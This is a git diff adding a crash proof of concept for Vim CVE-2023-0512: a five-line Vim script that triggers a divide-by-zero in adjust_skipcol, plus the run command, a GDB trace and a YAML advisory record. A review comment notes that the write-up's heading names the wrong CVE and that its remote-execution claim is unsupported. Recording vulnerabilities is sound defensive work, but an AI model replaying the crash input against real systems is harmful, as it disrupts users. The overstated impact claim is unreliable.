diff --git a/cve/vim/2023/CVE-2023-0512/poc_dbz01_s.dat b/cve/vim/2023/CVE-2023-0512/poc_dbz01_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..786b9d253b0607a57c7881a6cc6c16fbb89c5a05
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-0512/poc_dbz01_s.dat
@@ -0,0 +1,5 @@
+wi0 0
+no0 H
+sil0norm0
+sil0norm00000:se!no
+sil0norm0
\ No newline at end of file
diff --git "a/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md" "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
new file mode 100644
index 0000000000000000000000000000000000000000..efca437fed854baad8099a88d9efb79bf7879939
--- /dev/null
+++ "b/cve/vim/2023/CVE-2023-0512/\346\274\217\346\264\236CVE-2023-0512.md"
@@ -0,0 +1,108 @@ +# 漏洞CVE-2023-0054 +## Description +Divide By Zero in function adjust_skipcol at move.c:1978 + +## Vim Version +```shell +git log +commit 7193323b7796c05573f3aa89d422e848feb3a8dc (HEAD -> master, tag: v9.0.1223, origin/master, origin/HEAD) +``` + +## Proof of Concept +```shell +./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +Floating point exception +``` + +# GDB + +``` +gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_dbz01_s.dat -c :qa! +─── Output/messages ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGFPE, Arithmetic exception. +0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +1978 row += col / width2; +─── Assembly ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 0x0000555555f020c4 adjust_skipcol+4025 mov $0x45c1,%edx + 0x0000555555f020c9 adjust_skipcol+4030 mov 0xd54f20(%rip),%rax # 0x555556c56ff0 + 0x0000555555f020d0 adjust_skipcol+4037 mov %edx,%fs:(%rax) + 0x0000555555f020d3 adjust_skipcol+4040 mov -0x2c(%rbp),%eax + 0x0000555555f020d6 adjust_skipcol+4043 cltd + 0x0000555555f020d7 adjust_skipcol+4044 idivl -0x20(%rbp) + 0x0000555555f020da adjust_skipcol+4047 add %eax,-0x28(%rbp) + 0x0000555555f020dd adjust_skipcol+4050 mov -0x2c(%rbp),%eax + 0x0000555555f020e0 adjust_skipcol+4053 cltd + 0x0000555555f020e1 adjust_skipcol+4054 idivl -0x20(%rbp) +─── Breakpoints ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── 
Expressions ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── History ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Memory ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���─────────────────────────── + rax 0x0000000000000008 rbx 0x0000555556d8e320 rcx 0x0000555556d968f8 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 + rbp 0x00007fffffff8e80 rsp 0x00007fffffff8e50 r8 0x0000000000000007 r9 0x000062100002e0ff r10 0x00007ffff65a1000 r11 0x00000000000000f8 + r12 0x00000000fffffff8 r13 0x00000ffffffff1fa r14 0x00007fffffff8fd0 r15 0x00007fffffffb750 rip 0x0000555555f020d7 eflags [ IF RF ] + cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000 +─── Source ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── + 1973 col -= width1; + 1974 ++row; + 1975 } + 1976 if (col > width2) + 1977 { + 1978 row += col / width2; + 1979 col = col % width2; + 1980 } + 1981 if (row >= curwin->w_height) + 1982 { +─── Stack ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[0] from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +[1] from 0x00005555558e44b0 in beginline+1831 at edit.c:2642 +[2] from 0x0000555555a741c4 in do_ecmd+35847 at ex_cmds.c:3167 +[3] from 0x0000555555b0626f in 
do_exedit+4927 at ex_docmd.c:7187 +[4] from 0x0000555555b01393 in ex_splitview+5888 at ex_docmd.c:6834 +[5] from 0x0000555555abd910 in do_one_cmd+59345 at ex_docmd.c:2580 +[6] from 0x0000555555aa5e4a in do_cmdline+16990 at ex_docmd.c:993 +[7] from 0x0000555555aa1bbd in do_cmdline_cmd+43 at ex_docmd.c:587 +[8] from 0x00005555568f8e11 in do_window+5838 at window.c:274 +[9] from 0x0000555555f71e34 in nv_window+730 at normal.c:5614 +[+] +─── Threads ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +[1] id 2116628 name vim from 0x0000555555f020d7 in adjust_skipcol+4044 at move.c:1978 +─── Variables ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +loc width1 = -8, width2 = 0, so = 0, scrolloff_cols = 0, scrolled = 0, col = 8, row = 1 +─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +>>> bt +#0 0x0000555555f020d7 in adjust_skipcol () at move.c:1978 +#1 0x00005555558e44b0 in beginline (flags=6) at edit.c:2642 +#2 0x0000555555a741c4 in do_ecmd (fnum=0, ffname=0x0, sfname=0x0, eap=0x7fffffffb410, newlnum=1, flags=1, oldwin=0x0) at ex_cmds.c:3167 +#3 0x0000555555b0626f in do_exedit (eap=0x7fffffffb410, old_curwin=0x625000023100) at ex_docmd.c:7187 +#4 0x0000555555b01393 in ex_splitview (eap=0x7fffffffb410) at ex_docmd.c:6834 +#5 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffb780, flags=11, cstack=0x7fffffffb8a0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#6 0x0000555555aa5e4a in do_cmdline (cmdline=0x7fffffffc090 "new", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#7 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x7fffffffc090 "new") at ex_docmd.c:587 +#8 0x00005555568f8e11 in do_window (nchar=14, 
Prenum=0, xchar=0) at window.c:274 +#9 0x0000555555f71e34 in nv_window (cap=0x7fffffffc210) at normal.c:5614 +#10 0x0000555555f28ab7 in normal_cmd (oap=0x7fffffffc330, toplevel=1) at normal.c:938 +#11 0x0000555555b1b123 in exec_normal (was_typed=0, use_vpeekc=0, may_use_terminal_loop=0) at ex_docmd.c:8887 +#12 0x0000555555b1aab8 in exec_normal_cmd (cmd=0x611000000b88 "0", remap=0, silent=0) at ex_docmd.c:8850 +#13 0x0000555555b19a00 in ex_normal (eap=0x7fffffffc710) at ex_docmd.c:8768 +#14 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffca80, flags=7, cstack=0x7fffffffcba0, fgetline=0x555556341b6c , cookie=0x7fffffffd470) at ex_docmd.c:2580 +#15 0x0000555555aa5e4a in do_cmdline (cmdline=0x611000000540 "wi0 0", fgetline=0x555556341b6c , cookie=0x7fffffffd470, flags=7) at ex_docmd.c:993 +#16 0x000055555633a828 in do_source_ext (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0, eap=0x0, clearvars=0) at scriptfile.c:1672 +#17 0x000055555633d027 in do_source (fname=0x603000000e23 "./poc_dbz01_s.dat", check_other=0, is_vimrc=0, ret_sid=0x0) at scriptfile.c:1818 +#18 0x000055555633571a in cmd_source (fname=0x603000000e23 "./poc_dbz01_s.dat", eap=0x7fffffffd6d0) at scriptfile.c:1163 +#19 0x0000555556335873 in ex_source (eap=0x7fffffffd6d0) at scriptfile.c:1189 +#20 0x0000555555abd910 in do_one_cmd (cmdlinep=0x7fffffffda40, flags=11, cstack=0x7fffffffdb60, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580 +#21 0x0000555555aa5e4a in do_cmdline (cmdline=0x603000000af0 "so ./poc_dbz01_s.dat", fgetline=0x0, cookie=0x0, flags=11) at ex_docmd.c:993 +#22 0x0000555555aa1bbd in do_cmdline_cmd (cmd=0x603000000af0 "so ./poc_dbz01_s.dat") at ex_docmd.c:587 +#23 0x0000555556adbcd1 in exe_commands (parmp=0x555556d8d460 ) at main.c:3146 +#24 0x0000555556ac5d79 in vim_main2 () at main.c:782 +#25 0x0000555556ac3251 in main (argc=15, argv=0x7fffffffe438) at main.c:433 +``` + +## Impact + +This vulnerability is capable of crashing software, modify memory, and 
possible remote execution.
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0512.yaml b/cve/vim/2023/yaml/CVE-2023-0512.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d0060dc5cab2f3325241ac2aa042b697a1238b01
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-0512.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-0512
+source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。
+ scope-of-influence:
+ vim < 9.0.1247
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0512
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2023-0512
+ cwe-id: CWE-369
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023, 除零错误
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 0d949e3432bd81fb3bc777aeab9ec46b183f9fb8..61038baf2d891612dd5fbaae31f42aeb7c5504e3 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -87,6 +87,7 @@ cve:
 - CVE-2022-2598
 - CVE-2023-0433
 - CVE-2023-0054
+ - CVE-2023-0512
 openssl:
 - CVE-2022-1292
 - CVE-2022-2274
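Review bot: The record's `id: CVE-2023-0512` and `cve-id: CVE-2023-0512` disagree with the heading of the companion write-up added in this same commit, `# 漏洞CVE-2023-0054`, which names a different CVE; one of the two should be corrected so the index entry and the write-up refer to the same issue. The `name` field here holds a one-line product description rather than a vulnerability title, which looks inconsistent with how a `name` key is normally used — worth checking against the repository's existing yaml records. The `description` states a crash and data error, while the write-up's Impact section claims memory modification and possible remote execution; the attached trace only demonstrates a SIGFPE in `adjust_skipcol`, which matches the `cwe-id: CWE-369` classification, so the two texts should be aligned on what is actually shown.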